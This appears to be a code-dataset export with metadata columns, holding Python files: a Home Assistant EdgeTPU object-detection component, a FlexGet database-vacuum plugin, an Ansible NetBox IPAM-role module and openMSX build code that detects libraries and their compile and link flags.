self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
"""Return camera entity id from process pictures."""
return self._camera_entity
@property
def name(self):
"""Return the name of the image processor."""
return self._name
@property
def state(self):
"""Return the state of the entity."""
return self._total_matches
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_MATCHES: self._matches,
# ATTR_SUMMARY: {item: len(values)
# for item, values in self._matches.items()},
ATTR_TOTAL_MATCHES: self._total_matches
}
# Function to read labels from text files.
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
"""Process the image."""
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
# Open image.
# _LOGGER.info("image = %s", image)
import io
img = Image.open(io.BytesIO(bytearray(image)))
# img.save("/tmp/test.jpg")
draw = ImageDraw.Draw(img)
# Run inference.
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
# Display result.
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
# Draw a rectangle.
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| 35.973822 | 98 | 0.627129 | import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
try:
from edgetpu.detection.engine import DetectionEngine
except ImportError:
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ")
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
def __init__(self, hass, camera_entity, name, config):
from edgetpu.detection.engine import DetectionEngine
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
return self._camera_entity
@property
def name(self):
return self._name
@property
def state(self):
return self._total_matches
@property
def device_state_attributes(self):
return {
ATTR_MATCHES: self._matches,
ATTR_TOTAL_MATCHES: self._total_matches
}
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
import io
img = Image.open(io.BytesIO(bytearray(image)))
draw = ImageDraw.Draw(img)
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| true | true |
f72ec0d8575ad1e8a480b6dfdd46dd3ea6886bf8 | 852 | py | Python | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2017-08-25T07:17:04.000Z | 2017-08-25T07:17:04.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2015-11-10T01:07:54.000Z | 2015-11-10T01:07:54.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24) # 6 months
# Run after the cleanup is actually finished, but before analyze
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
# Vacuum can take a long time, and is not needed frequently
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| 40.571429 | 91 | 0.766432 | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24)
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| true | true |
f72ec1736a03659240a215c3e1fbd08ab2fda8f4 | 4,325 | py | Python | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Mikhail Yohman (@FragmentedPacket)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
"""
Main entry point for module execution
"""
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__": # pragma: no cover
main()
| 26.697531 | 97 | 0.652948 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__":
main()
| true | true |
f72ec1db4dbbb5d7b20d5ea18b138b8111539f7c | 17,753 | py | Python | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 5 | 2015-02-27T21:42:28.000Z | 2021-10-10T23:36:08.000Z | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2015-06-15T09:57:56.000Z | 2017-05-14T01:11:48.000Z | # Some notes about static linking:
# There are two ways of linking to static library: using the -l command line
# option or specifying the full path to the library file as one of the inputs.
# When using the -l option, the library search paths will be searched for a
# dynamic version of the library, if that is not found, the search paths will
# be searched for a static version of the library. This means we cannot force
# static linking of a library this way. It is possible to force static linking
# of all libraries, but we want to control it per library.
# Conclusion: We have to specify the full path to each library that should be
# linked statically.
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
libName = None
makeName = None
header = None
configScriptName = None
dynamicLibsOption = '--libs'
staticLibsOption = None
function = None
# TODO: A library can give an application compile time and run time
# dependencies on other libraries. For example SDL_ttf depends on
# FreeType only at run time, but depends on SDL both compile time
# and run time, since SDL is part of its interface and FreeType is
# only used by the implementation. As a result, it is possible to
# compile against SDL_ttf without having the FreeType headers
# installed. But our getCompileFlags() does not support this.
# In pkg-config these are called private dependencies.
dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform): # pylint: disable-msg=W0613
'''Returns True iff this library is a system library on the given
platform.
A system library is a library that is available systemwide in the
minimal installation of the OS.
The default implementation returns False.
'''
return False
@classmethod
def getConfigScript( # pylint: disable-msg=W0613
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
# TODO: A generic mechanism for locating config scripts in SDKs.
# Note that distroRoot is for non-system libs only.
# Trying a path relative to the compiler location would
# probably work well.
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform): # pylint: disable-msg=W0613
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform): # pylint: disable-msg=W0613
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
'''Returns the version of this library, "unknown" if there is no
mechanism to retrieve the version, None if there is a mechanism
to retrieve the version but it failed, or a callable that takes a
CompileCommand and a log stream as its arguments and returns the
version or None if retrieval failed.
'''
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
libName = 'freetype'
makeName = 'FREETYPE'
header = ('<ft2build.h>', 'FT_FREETYPE_H')
configScriptName = 'freetype-config'
function = 'FT_Open_Face'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getConfigScript(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
if distroRoot == '/usr/local':
# FreeType is located in the X11 tree, not the ports tree.
distroRoot = '/usr/X11R6'
return super(FreeType, cls).getConfigScript(
platform, linkStatic, distroRoot
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
return '`%s --ftversion`' % configScript
class GL(Library):
libName = 'GL'
makeName = 'GL'
function = 'glGenTextures'
@classmethod
def isSystemLibrary(cls, platform):
# On *BSD, OpenGL is in ports, not in the base system.
return not platform.endswith('bsd')
@classmethod
def getHeaders(cls, platform):
if platform == 'darwin':
return ('<OpenGL/gl.h>', )
else:
return ('<GL/gl.h>', )
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
return '-I/usr/X11R6/include -I/usr/X11R7/include'
else:
return super(GL, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'darwin':
return '-framework OpenGL'
elif platform.startswith('mingw'):
return '-lopengl32'
elif platform in ('netbsd', 'openbsd'):
return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
else:
return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
versionPairs = tuple(
( major, minor )
for major in range(1, 10)
for minor in range(0, 10)
)
version = cmd.expand(log, cls.getHeaders(platform), *(
'GL_VERSION_%d_%d' % pair for pair in versionPairs
))
try:
return '%d.%d' % max(
ver
for ver, exp in zip(versionPairs, version)
if exp is not None
)
except ValueError:
return None
return execute
class GLEW(Library):
makeName = 'GLEW'
header = '<GL/glew.h>'
function = 'glewInit'
dependsOn = ('GL', )
@classmethod
def getLibName(cls, platform):
if platform.startswith('mingw'):
return 'glew32'
else:
return 'GLEW'
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(GLEW, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if platform.startswith('mingw') and linkStatic:
return '%s -DGLEW_STATIC' % flags
else:
return flags
class LibPNG(Library):
libName = 'png12'
makeName = 'PNG'
header = '<png.h>'
configScriptName = 'libpng-config'
dynamicLibsOption = '--ldflags'
function = 'png_write_image'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class LibXML2(Library):
libName = 'xml2'
makeName = 'XML'
header = '<libxml/parser.h>'
configScriptName = 'xml2-config'
function = 'xmlParseDocument'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(LibXML2, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if not linkStatic or cls.isSystemLibrary(platform):
return flags
else:
return flags + ' -DLIBXML_STATIC'
class OGG(Library):
libName = 'ogg'
makeName = 'OGG'
header = '<ogg/ogg.h>'
function = 'ogg_stream_init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL(Library):
libName = 'SDL'
makeName = 'SDL'
header = '<SDL.h>'
configScriptName = 'sdl-config'
staticLibsOption = '--static-libs'
function = 'SDL_Init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL_ttf(Library):
libName = 'SDL_ttf'
makeName = 'SDL_TTF'
header = '<SDL_ttf.h>'
function = 'TTF_OpenFont'
dependsOn = ('SDL', 'FREETYPE')
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform),
'SDL_TTF_MAJOR_VERSION',
'SDL_TTF_MINOR_VERSION',
'SDL_TTF_PATCHLEVEL',
)
return None if None in version else '%s.%s.%s' % version
return execute
class TCL(Library):
libName = 'tcl'
makeName = 'TCL'
header = '<tcl.h>'
function = 'Tcl_CreateInterp'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getTclConfig(cls, platform, distroRoot):
'''Tcl has a config script that is unlike the typical lib-config script.
Information is gathered by sourcing the config script, instead of
executing it and capturing the queried value from stdout. This script
is located in a library directory, not in a directory in the PATH.
Also, it does not have the executable bit set.
This method returns the location of the Tcl config script, or None if
it could not be found.
'''
if hasattr(cls, 'tclConfig'):
# Return cached value.
return cls.tclConfig
def iterLocations():
if platform == 'android':
# Under Android, the tcl set-up apparently differs from
# other cross-platform setups. the search algorithm to find the
# directory that will contain the tclConfig.sh script and the shared libs
# is not applicable to Android. Instead, immediately return the correct
# subdirectories to the routine that invokes iterLocations()
sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
libpath = sdl_android_port_path + '/project/libs/armeabi'
yield libpath
tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
yield tclpath
else:
if distroRoot is None or cls.isSystemLibrary(platform):
roots = ('/usr/local', '/usr')
else:
roots = (distroRoot, )
for root in roots:
if isdir(root):
for libdir in ('lib', 'lib64', 'lib/tcl'):
libpath = root + '/' + libdir
if isdir(libpath):
yield libpath
for entry in listdir(libpath):
if entry.startswith('tcl8.'):
tclpath = libpath + '/' + entry
if isdir(tclpath):
yield tclpath
tclConfigs = {}
log = open('derived/tcl-search.log', 'w')
print >> log, 'Looking for Tcl...'
try:
for location in iterLocations():
path = location + '/tclConfig.sh'
if isfile(path):
print >> log, 'Config script:', path
text = captureStdout(
log,
"sh -c '. %s && echo %s'" % (
path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
)
)
if text is not None:
try:
# pylint: disable-msg=E1103
major, minor = text.split()
version = int(major), int(minor)
except ValueError:
pass
else:
print >> log, 'Found: version %d.%d' % version
tclConfigs[path] = version
try:
# Minimum required version is 8.5.
# Pick the oldest possible version to minimize the risk of
# running into incompatible changes.
tclConfig = min(
( version, path )
for path, version in tclConfigs.iteritems()
if version >= (8, 5)
)[1]
except ValueError:
tclConfig = None
print >> log, 'No suitable versions found.'
else:
print >> log, 'Selected:', tclConfig
finally:
log.close()
cls.tclConfig = tclConfig
return tclConfig
@classmethod
def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
tclConfig = cls.getTclConfig(platform, distroRoot)
if tclConfig is None:
return None
log = open('derived/tcl-search.log', 'a')
try:
print >> log, 'Getting Tcl %s...' % description
text = captureStdout(
log,
shjoin([
'sh', '-c',
'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
])
)
if text is not None:
print >> log, 'Result: %s' % text.strip()
finally:
log.close()
return None if text is None else text.strip()
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
# Use the current ANDROID cross-compilation flags and not the TCL flags. Otherwise, the
# wrong version of libstdc++ will end-up on the include path; the minimal Android NDK
# version instead of the more complete GNU version. This is because TCL for Android has
# been configured with the minimal libstdc++ on the include path in the C(XX) flags and
# not with the more complete GNU version
return environ['ANDROID_CXXFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
# The -DSTATIC_BUILD is a hack to avoid including the complete
# TCL_DEFS (see 9f1dbddda2) but still being able to link on
# MinGW (tcl.h depends on this being defined properly).
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
'compile flags'
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
# Use the current ANDROID cross-compilation flags and not the TCL flags to
# prevent issues with libstdc++ version. See also getCompileFlags()
return environ['ANDROID_LDFLAGS']
# Tcl can be built as a shared or as a static library, but not both.
# Check whether the library type of Tcl matches the one we want.
wantShared = not linkStatic or cls.isSystemLibrary(platform)
tclShared = cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_SHARED_BUILD}',
'library type (shared/static)'
)
log = open('derived/tcl-search.log', 'a')
try:
if tclShared == '0':
if wantShared:
print >> log, (
'Dynamic linking requested, but Tcl installation has '
'static library.'
)
return None
elif tclShared == '1':
if not wantShared:
print >> log, (
'Static linking requested, but Tcl installation has '
'dynamic library.'
)
return None
else:
print >> log, (
'Unable to determine whether Tcl installation has '
'shared or static library.'
)
return None
finally:
log.close()
# Now get the link flags.
if wantShared:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_LIB_SPEC}',
'dynamic link flags'
)
else:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
'static link flags'
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
'version'
)
class Theora(Library):
libName = 'theoradec'
makeName = 'THEORA'
header = '<theora/theoradec.h>'
function = 'th_decode_ycbcr_out'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class Vorbis(Library):
libName = 'vorbis'
makeName = 'VORBIS'
header = '<vorbis/codec.h>'
function = 'vorbis_synthesis_pcmout'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class ZLib(Library):
libName = 'z'
makeName = 'ZLIB'
header = '<zlib.h>'
function = 'inflate'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
return None if version is None else version.strip('"')
return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
for obj in localObjects:
if isinstance(obj, type) and issubclass(obj, Library):
if not (obj is Library):
yield obj.makeName, obj
